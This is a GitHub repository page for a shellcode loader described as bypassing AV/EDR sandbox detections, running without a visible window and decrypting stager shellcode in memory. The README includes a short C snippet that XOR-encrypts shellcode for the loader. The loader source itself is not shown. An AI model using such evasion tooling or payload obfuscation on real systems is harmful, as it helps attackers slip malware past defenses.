Skip to content
/ LogansBestFriend Public

Customized Shellcode loader which bypasses AV/EDR sandbox detections and decrypts shellcode in memory.

License

GPL-3.0 license
4 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

logangoins/LogansBestFriend

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
LogansBestFriend
LogansBestFriend
 
 
LICENSE
LICENSE
 
 
LogansBestFriend.sln
LogansBestFriend.sln
 
 
README.md
README.md
 
 

Repository files navigation

LogansBestFriend

LogansBestFriend is a practical modification of the simple shellcode loader "GregsBestFriend" from WhiteKnightLabs, which uses regex to bypass sandbox detections.

LogansBestFriend's configuration does not pop a debug CMD window and executes as a background process, as well as decrypts stager shellcode in memory.

Stager shellcode in the C format can be encrypted by using:

#include <stdio.h>

unsigned char code[] = "\x90\x90\x90";

int main()
{

    char key[] = "key"; //Enter key here
    int keylen = strlen(key);
    int i = 0;
    for (i; i < sizeof(code); i++) {
        printf("\\x%02x",code[i]^key[i % keylen]);
    }
 
}

About

Customized Shellcode loader which bypasses AV/EDR sandbox detections and decrypts shellcode in memory.

Resources

Readme

License

GPL-3.0 license
Activity

Stars

4 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages